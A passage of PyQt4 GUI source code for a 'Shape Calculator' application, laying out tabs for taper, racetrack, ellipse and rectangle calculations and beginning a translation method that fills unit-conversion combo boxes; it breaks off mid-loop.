spacerItem2 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_11.addItem(spacerItem2)
self.btnCircles = QtGui.QPushButton(self.tabCircles)
self.btnCircles.setMinimumSize(QtCore.QSize(200, 0))
self.btnCircles.setMaximumSize(QtCore.QSize(200, 16777215))
font = QtGui.QFont()
font.setPointSize(9)
self.btnCircles.setFont(font)
self.btnCircles.setObjectName(_fromUtf8("btnCircles"))
self.horizontalLayout_11.addWidget(self.btnCircles)
self.verticalLayout_3.addLayout(self.horizontalLayout_11)
self.horizontalLayout_12 = QtGui.QHBoxLayout()
self.horizontalLayout_12.setObjectName(_fromUtf8("horizontalLayout_12"))
spacerItem3 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_12.addItem(spacerItem3)
self.imageCircle = QtGui.QLabel(self.tabCircles)
self.imageCircle.setMaximumSize(QtCore.QSize(345, 124))
self.imageCircle.setText(_fromUtf8(""))
self.imageCircle.setPixmap(QtGui.QPixmap(_fromUtf8("images/image_circle.png")))
self.imageCircle.setScaledContents(True)
self.imageCircle.setObjectName(_fromUtf8("imageCircle"))
self.horizontalLayout_12.addWidget(self.imageCircle)
spacerItem4 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_12.addItem(spacerItem4)
self.verticalLayout_3.addLayout(self.horizontalLayout_12)
spacerItem5 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_3.addItem(spacerItem5)
self.btnConversions.addTab(self.tabCircles, _fromUtf8(""))
self.tabTaper = QtGui.QWidget()
self.tabTaper.setObjectName(_fromUtf8("tabTaper"))
self.verticalLayout_2 = QtGui.QVBoxLayout(self.tabTaper)
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.labelTaperTitle = QtGui.QLabel(self.tabTaper)
font = QtGui.QFont()
font.setPointSize(14)
self.labelTaperTitle.setFont(font)
self.labelTaperTitle.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.labelTaperTitle.setObjectName(_fromUtf8("labelTaperTitle"))
self.verticalLayout_2.addWidget(self.labelTaperTitle)
self.labelTaperInput = QtGui.QLabel(self.tabTaper)
font = QtGui.QFont()
font.setPointSize(9)
self.labelTaperInput.setFont(font)
self.labelTaperInput.setObjectName(_fromUtf8("labelTaperInput"))
self.verticalLayout_2.addWidget(self.labelTaperInput)
self.formLayout = QtGui.QFormLayout()
self.formLayout.setObjectName(_fromUtf8("formLayout"))
self.labelAngle = QtGui.QLabel(self.tabTaper)
self.labelAngle.setMinimumSize(QtCore.QSize(250, 0))
self.labelAngle.setObjectName(_fromUtf8("labelAngle"))
self.formLayout.setWidget(0, QtGui.QFormLayout.LabelRole, self.labelAngle)
self.labelDiameter1 = QtGui.QLabel(self.tabTaper)
self.labelDiameter1.setObjectName(_fromUtf8("labelDiameter1"))
self.formLayout.setWidget(1, QtGui.QFormLayout.LabelRole, self.labelDiameter1)
self.labelDiameter2 = QtGui.QLabel(self.tabTaper)
self.labelDiameter2.setObjectName(_fromUtf8("labelDiameter2"))
self.formLayout.setWidget(2, QtGui.QFormLayout.LabelRole, self.labelDiameter2)
self.labelLength = QtGui.QLabel(self.tabTaper)
self.labelLength.setObjectName(_fromUtf8("labelLength"))
self.formLayout.setWidget(3, QtGui.QFormLayout.LabelRole, self.labelLength)
self.txtTA_Angle = QtGui.QLineEdit(self.tabTaper)
font = QtGui.QFont()
font.setPointSize(11)
self.txtTA_Angle.setFont(font)
self.txtTA_Angle.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtTA_Angle.setObjectName(_fromUtf8("txtTA_Angle"))
self.formLayout.setWidget(0, QtGui.QFormLayout.FieldRole, self.txtTA_Angle)
self.txtTA_Diameter1 = QtGui.QLineEdit(self.tabTaper)
font = QtGui.QFont()
font.setPointSize(11)
self.txtTA_Diameter1.setFont(font)
self.txtTA_Diameter1.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtTA_Diameter1.setObjectName(_fromUtf8("txtTA_Diameter1"))
self.formLayout.setWidget(1, QtGui.QFormLayout.FieldRole, self.txtTA_Diameter1)
self.txtTA_Diameter2 = QtGui.QLineEdit(self.tabTaper)
font = QtGui.QFont()
font.setPointSize(11)
self.txtTA_Diameter2.setFont(font)
self.txtTA_Diameter2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtTA_Diameter2.setObjectName(_fromUtf8("txtTA_Diameter2"))
self.formLayout.setWidget(2, QtGui.QFormLayout.FieldRole, self.txtTA_Diameter2)
self.txtTA_Length = QtGui.QLineEdit(self.tabTaper)
font = QtGui.QFont()
font.setPointSize(11)
self.txtTA_Length.setFont(font)
self.txtTA_Length.setStyleSheet(_fromUtf8(""))
self.txtTA_Length.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtTA_Length.setReadOnly(False)
self.txtTA_Length.setObjectName(_fromUtf8("txtTA_Length"))
self.formLayout.setWidget(3, QtGui.QFormLayout.FieldRole, self.txtTA_Length)
self.verticalLayout_2.addLayout(self.formLayout)
self.horizontalLayout_9 = QtGui.QHBoxLayout()
self.horizontalLayout_9.setObjectName(_fromUtf8("horizontalLayout_9"))
spacerItem6 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_9.addItem(spacerItem6)
self.btnTaper = QtGui.QPushButton(self.tabTaper)
self.btnTaper.setMinimumSize(QtCore.QSize(200, 0))
self.btnTaper.setMaximumSize(QtCore.QSize(200, 16777215))
font = QtGui.QFont()
font.setPointSize(9)
self.btnTaper.setFont(font)
self.btnTaper.setObjectName(_fromUtf8("btnTaper"))
self.horizontalLayout_9.addWidget(self.btnTaper)
self.verticalLayout_2.addLayout(self.horizontalLayout_9)
self.horizontalLayout_10 = QtGui.QHBoxLayout()
self.horizontalLayout_10.setObjectName(_fromUtf8("horizontalLayout_10"))
spacerItem7 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_10.addItem(spacerItem7)
self.imageTaper = QtGui.QLabel(self.tabTaper)
self.imageTaper.setMaximumSize(QtCore.QSize(352, 194))
self.imageTaper.setText(_fromUtf8(""))
self.imageTaper.setPixmap(QtGui.QPixmap(_fromUtf8("images/image_taper.png")))
self.imageTaper.setScaledContents(True)
self.imageTaper.setObjectName(_fromUtf8("imageTaper"))
self.horizontalLayout_10.addWidget(self.imageTaper)
spacerItem8 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_10.addItem(spacerItem8)
self.verticalLayout_2.addLayout(self.horizontalLayout_10)
spacerItem9 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_2.addItem(spacerItem9)
self.btnConversions.addTab(self.tabTaper, _fromUtf8(""))
self.tabRaceTrack = QtGui.QWidget()
self.tabRaceTrack.setObjectName(_fromUtf8("tabRaceTrack"))
self.verticalLayout_4 = QtGui.QVBoxLayout(self.tabRaceTrack)
self.verticalLayout_4.setObjectName(_fromUtf8("verticalLayout_4"))
self.labelTitleRT = QtGui.QLabel(self.tabRaceTrack)
font = QtGui.QFont()
font.setPointSize(14)
self.labelTitleRT.setFont(font)
self.labelTitleRT.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.labelTitleRT.setObjectName(_fromUtf8("labelTitleRT"))
self.verticalLayout_4.addWidget(self.labelTitleRT)
self.labelInputRT = QtGui.QLabel(self.tabRaceTrack)
font = QtGui.QFont()
font.setPointSize(9)
self.labelInputRT.setFont(font)
self.labelInputRT.setObjectName(_fromUtf8("labelInputRT"))
self.verticalLayout_4.addWidget(self.labelInputRT)
self.formLayout_3 = QtGui.QFormLayout()
self.formLayout_3.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
self.formLayout_3.setObjectName(_fromUtf8("formLayout_3"))
self.labelRTx = QtGui.QLabel(self.tabRaceTrack)
self.labelRTx.setMinimumSize(QtCore.QSize(250, 0))
self.labelRTx.setObjectName(_fromUtf8("labelRTx"))
self.formLayout_3.setWidget(0, QtGui.QFormLayout.LabelRole, self.labelRTx)
self.txtRTRK_x = QtGui.QLineEdit(self.tabRaceTrack)
font = QtGui.QFont()
font.setPointSize(11)
self.txtRTRK_x.setFont(font)
self.txtRTRK_x.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRTRK_x.setObjectName(_fromUtf8("txtRTRK_x"))
self.formLayout_3.setWidget(0, QtGui.QFormLayout.FieldRole, self.txtRTRK_x)
self.labelRTy = QtGui.QLabel(self.tabRaceTrack)
self.labelRTy.setObjectName(_fromUtf8("labelRTy"))
self.formLayout_3.setWidget(1, QtGui.QFormLayout.LabelRole, self.labelRTy)
self.txtRTRK_y = QtGui.QLineEdit(self.tabRaceTrack)
font = QtGui.QFont()
font.setPointSize(11)
self.txtRTRK_y.setFont(font)
self.txtRTRK_y.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRTRK_y.setObjectName(_fromUtf8("txtRTRK_y"))
self.formLayout_3.setWidget(1, QtGui.QFormLayout.FieldRole, self.txtRTRK_y)
self.labelRTarea = QtGui.QLabel(self.tabRaceTrack)
self.labelRTarea.setObjectName(_fromUtf8("labelRTarea"))
self.formLayout_3.setWidget(3, QtGui.QFormLayout.LabelRole, self.labelRTarea)
self.txtRTRK_csa = QtGui.QLineEdit(self.tabRaceTrack)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.txtRTRK_csa.setFont(font)
self.txtRTRK_csa.setStyleSheet(_fromUtf8(""))
self.txtRTRK_csa.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRTRK_csa.setReadOnly(False)
self.txtRTRK_csa.setObjectName(_fromUtf8("txtRTRK_csa"))
self.formLayout_3.setWidget(3, QtGui.QFormLayout.FieldRole, self.txtRTRK_csa)
self.labelRTcircumference = QtGui.QLabel(self.tabRaceTrack)
self.labelRTcircumference.setObjectName(_fromUtf8("labelRTcircumference"))
self.formLayout_3.setWidget(4, QtGui.QFormLayout.LabelRole, self.labelRTcircumference)
self.txtRTRK_cfm = QtGui.QLineEdit(self.tabRaceTrack)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.txtRTRK_cfm.setFont(font)
self.txtRTRK_cfm.setStyleSheet(_fromUtf8(""))
self.txtRTRK_cfm.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRTRK_cfm.setReadOnly(False)
self.txtRTRK_cfm.setObjectName(_fromUtf8("txtRTRK_cfm"))
self.formLayout_3.setWidget(4, QtGui.QFormLayout.FieldRole, self.txtRTRK_cfm)
self.LabelRTz = QtGui.QLabel(self.tabRaceTrack)
self.LabelRTz.setObjectName(_fromUtf8("LabelRTz"))
self.formLayout_3.setWidget(2, QtGui.QFormLayout.LabelRole, self.LabelRTz)
self.txtRTRK_z = QtGui.QLineEdit(self.tabRaceTrack)
font = QtGui.QFont()
font.setPointSize(11)
self.txtRTRK_z.setFont(font)
self.txtRTRK_z.setAutoFillBackground(False)
self.txtRTRK_z.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.txtRTRK_z.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRTRK_z.setReadOnly(True)
self.txtRTRK_z.setObjectName(_fromUtf8("txtRTRK_z"))
self.formLayout_3.setWidget(2, QtGui.QFormLayout.FieldRole, self.txtRTRK_z)
self.verticalLayout_4.addLayout(self.formLayout_3)
self.horizontalLayout_5 = QtGui.QHBoxLayout()
self.horizontalLayout_5.setObjectName(_fromUtf8("horizontalLayout_5"))
spacerItem10 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_5.addItem(spacerItem10)
self.btnRacetrack = QtGui.QPushButton(self.tabRaceTrack)
self.btnRacetrack.setMinimumSize(QtCore.QSize(200, 0))
self.btnRacetrack.setMaximumSize(QtCore.QSize(200, 16777215))
font = QtGui.QFont()
font.setPointSize(9)
self.btnRacetrack.setFont(font)
self.btnRacetrack.setObjectName(_fromUtf8("btnRacetrack"))
self.horizontalLayout_5.addWidget(self.btnRacetrack)
self.verticalLayout_4.addLayout(self.horizontalLayout_5)
self.horizontalLayout_6 = QtGui.QHBoxLayout()
self.horizontalLayout_6.setObjectName(_fromUtf8("horizontalLayout_6"))
spacerItem11 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem11)
self.imageRacetrack = QtGui.QLabel(self.tabRaceTrack)
self.imageRacetrack.setMaximumSize(QtCore.QSize(400, 139))
self.imageRacetrack.setText(_fromUtf8(""))
self.imageRacetrack.setPixmap(QtGui.QPixmap(_fromUtf8("images/image_racetrack.png")))
self.imageRacetrack.setScaledContents(True)
self.imageRacetrack.setObjectName(_fromUtf8("imageRacetrack"))
self.horizontalLayout_6.addWidget(self.imageRacetrack)
spacerItem12 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem12)
self.verticalLayout_4.addLayout(self.horizontalLayout_6)
spacerItem13 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_4.addItem(spacerItem13)
self.btnConversions.addTab(self.tabRaceTrack, _fromUtf8(""))
self.tabEllipse = QtGui.QWidget()
self.tabEllipse.setObjectName(_fromUtf8("tabEllipse"))
self.verticalLayout_5 = QtGui.QVBoxLayout(self.tabEllipse)
self.verticalLayout_5.setObjectName(_fromUtf8("verticalLayout_5"))
self.labelTitleEllipse = QtGui.QLabel(self.tabEllipse)
font = QtGui.QFont()
font.setPointSize(14)
self.labelTitleEllipse.setFont(font)
self.labelTitleEllipse.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.labelTitleEllipse.setObjectName(_fromUtf8("labelTitleEllipse"))
self.verticalLayout_5.addWidget(self.labelTitleEllipse)
self.labelInputEllipse = QtGui.QLabel(self.tabEllipse)
font = QtGui.QFont()
font.setPointSize(9)
self.labelInputEllipse.setFont(font)
self.labelInputEllipse.setObjectName(_fromUtf8("labelInputEllipse"))
self.verticalLayout_5.addWidget(self.labelInputEllipse)
self.formLayout_4 = QtGui.QFormLayout()
self.formLayout_4.setObjectName(_fromUtf8("formLayout_4"))
self.labelSMajor = QtGui.QLabel(self.tabEllipse)
self.labelSMajor.setMinimumSize(QtCore.QSize(250, 0))
self.labelSMajor.setObjectName(_fromUtf8("labelSMajor"))
self.formLayout_4.setWidget(0, QtGui.QFormLayout.LabelRole, self.labelSMajor)
self.labelSMinor = QtGui.QLabel(self.tabEllipse)
self.labelSMinor.setObjectName(_fromUtf8("labelSMinor"))
self.formLayout_4.setWidget(1, QtGui.QFormLayout.LabelRole, self.labelSMinor)
self.labelEArea = QtGui.QLabel(self.tabEllipse)
self.labelEArea.setObjectName(_fromUtf8("labelEArea"))
self.formLayout_4.setWidget(2, QtGui.QFormLayout.LabelRole, self.labelEArea)
self.labelEcircumference = QtGui.QLabel(self.tabEllipse)
self.labelEcircumference.setObjectName(_fromUtf8("labelEcircumference"))
self.formLayout_4.setWidget(3, QtGui.QFormLayout.LabelRole, self.labelEcircumference)
self.txtEllipses_semimajor = QtGui.QLineEdit(self.tabEllipse)
font = QtGui.QFont()
font.setPointSize(11)
self.txtEllipses_semimajor.setFont(font)
self.txtEllipses_semimajor.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtEllipses_semimajor.setObjectName(_fromUtf8("txtEllipses_semimajor"))
self.formLayout_4.setWidget(0, QtGui.QFormLayout.FieldRole, self.txtEllipses_semimajor)
self.txtEllipses_semiminor = QtGui.QLineEdit(self.tabEllipse)
font = QtGui.QFont()
font.setPointSize(11)
self.txtEllipses_semiminor.setFont(font)
self.txtEllipses_semiminor.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtEllipses_semiminor.setObjectName(_fromUtf8("txtEllipses_semiminor"))
self.formLayout_4.setWidget(1, QtGui.QFormLayout.FieldRole, self.txtEllipses_semiminor)
self.txtEllipses_csa = QtGui.QLineEdit(self.tabEllipse)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.txtEllipses_csa.setFont(font)
self.txtEllipses_csa.setStyleSheet(_fromUtf8(""))
self.txtEllipses_csa.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtEllipses_csa.setReadOnly(False)
self.txtEllipses_csa.setObjectName(_fromUtf8("txtEllipses_csa"))
self.formLayout_4.setWidget(2, QtGui.QFormLayout.FieldRole, self.txtEllipses_csa)
self.txtEllipses_circumference = QtGui.QLineEdit(self.tabEllipse)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.txtEllipses_circumference.setFont(font)
self.txtEllipses_circumference.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.txtEllipses_circumference.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtEllipses_circumference.setReadOnly(True)
self.txtEllipses_circumference.setObjectName(_fromUtf8("txtEllipses_circumference"))
self.formLayout_4.setWidget(3, QtGui.QFormLayout.FieldRole, self.txtEllipses_circumference)
self.verticalLayout_5.addLayout(self.formLayout_4)
self.horizontalLayout_3 = QtGui.QHBoxLayout()
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
spacerItem14 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem14)
self.btnEllipses = QtGui.QPushButton(self.tabEllipse)
self.btnEllipses.setMinimumSize(QtCore.QSize(200, 0))
self.btnEllipses.setMaximumSize(QtCore.QSize(200, 16777215))
self.btnEllipses.setObjectName(_fromUtf8("btnEllipses"))
self.horizontalLayout_3.addWidget(self.btnEllipses)
self.verticalLayout_5.addLayout(self.horizontalLayout_3)
self.horizontalLayout_4 = QtGui.QHBoxLayout()
self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
spacerItem15 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem15)
self.imageEllipse = QtGui.QLabel(self.tabEllipse)
self.imageEllipse.setMaximumSize(QtCore.QSize(329, 204))
self.imageEllipse.setText(_fromUtf8(""))
self.imageEllipse.setPixmap(QtGui.QPixmap(_fromUtf8("images/image_elipse.png")))
self.imageEllipse.setScaledContents(True)
self.imageEllipse.setObjectName(_fromUtf8("imageEllipse"))
self.horizontalLayout_4.addWidget(self.imageEllipse)
spacerItem16 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem16)
self.verticalLayout_5.addLayout(self.horizontalLayout_4)
spacerItem17 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_5.addItem(spacerItem17)
self.btnConversions.addTab(self.tabEllipse, _fromUtf8(""))
self.tab = QtGui.QWidget()
self.tab.setObjectName(_fromUtf8("tab"))
self.verticalLayout_7 = QtGui.QVBoxLayout(self.tab)
self.verticalLayout_7.setObjectName(_fromUtf8("verticalLayout_7"))
self.label_5 = QtGui.QLabel(self.tab)
font = QtGui.QFont()
font.setPointSize(14)
self.label_5.setFont(font)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.verticalLayout_7.addWidget(self.label_5)
self.label_6 = QtGui.QLabel(self.tab)
self.label_6.setObjectName(_fromUtf8("label_6"))
self.verticalLayout_7.addWidget(self.label_6)
self.gridLayout_2 = QtGui.QGridLayout()
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.label_10 = QtGui.QLabel(self.tab)
self.label_10.setObjectName(_fromUtf8("label_10"))
self.gridLayout_2.addWidget(self.label_10, 4, 0, 1, 1)
self.label_8 = QtGui.QLabel(self.tab)
self.label_8.setObjectName(_fromUtf8("label_8"))
self.gridLayout_2.addWidget(self.label_8, 1, 0, 1, 1)
self.label_9 = QtGui.QLabel(self.tab)
self.label_9.setObjectName(_fromUtf8("label_9"))
self.gridLayout_2.addWidget(self.label_9, 2, 0, 1, 1)
self.label_7 = QtGui.QLabel(self.tab)
self.label_7.setMinimumSize(QtCore.QSize(250, 0))
self.label_7.setObjectName(_fromUtf8("label_7"))
self.gridLayout_2.addWidget(self.label_7, 0, 0, 1, 1)
self.txtRectangleR = QtGui.QLineEdit(self.tab)
font = QtGui.QFont()
font.setPointSize(11)
self.txtRectangleR.setFont(font)
self.txtRectangleR.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRectangleR.setObjectName(_fromUtf8("txtRectangleR"))
self.gridLayout_2.addWidget(self.txtRectangleR, 2, 1, 1, 1)
self.txtRectangleCfm = QtGui.QLineEdit(self.tab)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.txtRectangleCfm.setFont(font)
self.txtRectangleCfm.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.txtRectangleCfm.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRectangleCfm.setReadOnly(True)
self.txtRectangleCfm.setObjectName(_fromUtf8("txtRectangleCfm"))
self.gridLayout_2.addWidget(self.txtRectangleCfm, 4, 1, 1, 1)
self.txtRectangleY = QtGui.QLineEdit(self.tab)
font = QtGui.QFont()
font.setPointSize(11)
self.txtRectangleY.setFont(font)
self.txtRectangleY.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRectangleY.setObjectName(_fromUtf8("txtRectangleY"))
self.gridLayout_2.addWidget(self.txtRectangleY, 1, 1, 1, 1)
self.txtRectangleX = QtGui.QLineEdit(self.tab)
font = QtGui.QFont()
font.setPointSize(11)
self.txtRectangleX.setFont(font)
self.txtRectangleX.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRectangleX.setObjectName(_fromUtf8("txtRectangleX"))
self.gridLayout_2.addWidget(self.txtRectangleX, 0, 1, 1, 1)
self.label_11 = QtGui.QLabel(self.tab)
self.label_11.setObjectName(_fromUtf8("label_11"))
self.gridLayout_2.addWidget(self.label_11, 3, 0, 1, 1)
self.txtRectangleArea = QtGui.QLineEdit(self.tab)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.txtRectangleArea.setFont(font)
self.txtRectangleArea.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.txtRectangleArea.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRectangleArea.setReadOnly(True)
self.txtRectangleArea.setObjectName(_fromUtf8("txtRectangleArea"))
self.gridLayout_2.addWidget(self.txtRectangleArea, 3, 1, 1, 1)
self.verticalLayout_7.addLayout(self.gridLayout_2)
self.horizontalLayout_7 = QtGui.QHBoxLayout()
self.horizontalLayout_7.setObjectName(_fromUtf8("horizontalLayout_7"))
spacerItem18 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_7.addItem(spacerItem18)
self.btnRectangle = QtGui.QPushButton(self.tab)
self.btnRectangle.setMinimumSize(QtCore.QSize(200, 0))
self.btnRectangle.setMaximumSize(QtCore.QSize(200, 16777215))
self.btnRectangle.setObjectName(_fromUtf8("btnRectangle"))
self.horizontalLayout_7.addWidget(self.btnRectangle)
self.verticalLayout_7.addLayout(self.horizontalLayout_7)
self.horizontalLayout_8 = QtGui.QHBoxLayout()
self.horizontalLayout_8.setObjectName(_fromUtf8("horizontalLayout_8"))
spacerItem19 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_8.addItem(spacerItem19)
self.imageRectangle = QtGui.QLabel(self.tab)
self.imageRectangle.setMaximumSize(QtCore.QSize(393, 132))
self.imageRectangle.setText(_fromUtf8(""))
self.imageRectangle.setPixmap(QtGui.QPixmap(_fromUtf8("images/image_rectangle.png")))
self.imageRectangle.setScaledContents(True)
self.imageRectangle.setObjectName(_fromUtf8("imageRectangle"))
self.horizontalLayout_8.addWidget(self.imageRectangle)
spacerItem20 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_8.addItem(spacerItem20)
self.verticalLayout_7.addLayout(self.horizontalLayout_8)
spacerItem21 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_7.addItem(spacerItem21)
self.btnConversions.addTab(self.tab, _fromUtf8(""))
self.verticalLayout.addWidget(self.btnConversions)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 458, 21))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName(_fromUtf8("menuFile"))
self.menuExit = QtGui.QMenu(self.menubar)
self.menuExit.setObjectName(_fromUtf8("menuExit"))
MainWindow.setMenuBar(self.menubar)
self.actionExit = QtGui.QAction(MainWindow)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(_fromUtf8("images/sCexit.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionExit.setIcon(icon1)
self.actionExit.setObjectName(_fromUtf8("actionExit"))
self.actionAbout = QtGui.QAction(MainWindow)
self.actionAbout.setObjectName(_fromUtf8("actionAbout"))
self.menuFile.addAction(self.actionExit)
self.menuExit.addAction(self.actionAbout)
self.menubar.addAction(self.menuFile.menuAction())
self.menubar.addAction(self.menuExit.menuAction())
self.retranslateUi(MainWindow)
self.btnConversions.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
    """Install all user-visible strings on the Shape Calculator UI.

    Originally generated by Qt Designer / pyuic4; the per-item combo-box
    calls are collapsed into data-driven loops.  Fixes two string typos:
    "singe" -> "single" and "oz//m³" -> "oz/m³" (the To box already used
    the single-slash form, so the From box was inconsistent).
    """
    def _tr(text):
        # Every call shares the same translation context and pyuic4 signature.
        return _translate("MainWindow", text, None)
    MainWindow.setWindowTitle(_tr("Shape Calculator"))
    self.label.setText(_tr("Shape Calculator"))
    self.btnReset.setText(_tr("Clear Form Fields"))
    self.labelTitleConversion.setText(_tr("Conversion Units"))
    self.labelTitleTo.setText(_tr("To"))
    self.labelTitleFrom.setText(_tr("From"))
    self.labelTitleVolume.setText(_tr("Volume"))
    self.label_3.setText(_tr("Mass"))
    self.labelTitleVelocity.setText(_tr("Mass Flow"))
    self.label_4.setText(_tr("Density"))
    self.labelTitleLength.setText(_tr("Length"))
    self.labelTitleArea.setText(_tr("Area"))
    # All conversion-tab input/output fields start at "0".
    for field in (self.lineEditOutputVolume, self.lineEditInputMassFlow,
                  self.lineEditOutputArea, self.lineEditOutputLength,
                  self.lineEditInputArea, self.lineEditOutputMassFlow,
                  self.lineEditInputDensity, self.lineEditOutputDensity,
                  self.lineEditInputVolume, self.lineEditInputMass,
                  self.lineEditOutputMass, self.lineEditInputLength):
        field.setText(_tr("0"))
    # Unit lists for the From/To combo boxes.
    # NOTE(review): the "to" area list swaps micron²/km² relative to the
    # "from" list in the generated code; order is preserved as-is because
    # the conversion logic may depend on item indices.
    length_units = ["mm", "cm", "m", "km", "micron", "inch", "foot", "mile"]
    area_from_units = ["mm²", "cm²", "m²", "km²", "micron²", "inch²", "ft²", "mile²"]
    area_to_units = ["mm²", "cm²", "m²", "micron²", "km²", "inch²", "ft²", "mile²"]
    volume_units = ["mm³", "cm³", "m³", "micron³", "inch³", "ft³", "L"]
    mass_units = ["kg", "g", "mg", "tonne", "lb", "oz"]
    # Typo fix: the From box previously listed "oz//m³".
    density_units = ["kg/m³", "g/m³", "mg/m³", "lb/ft³", "lb/in³", "oz/m³"]
    massflow_units = ["kg/s", "lb/hr", "kg/hr", "lb/min"]
    for combo, units in ((self.comboBoxFromLength, length_units),
                         (self.comboBoxToLength, length_units),
                         (self.comboBoxFromArea, area_from_units),
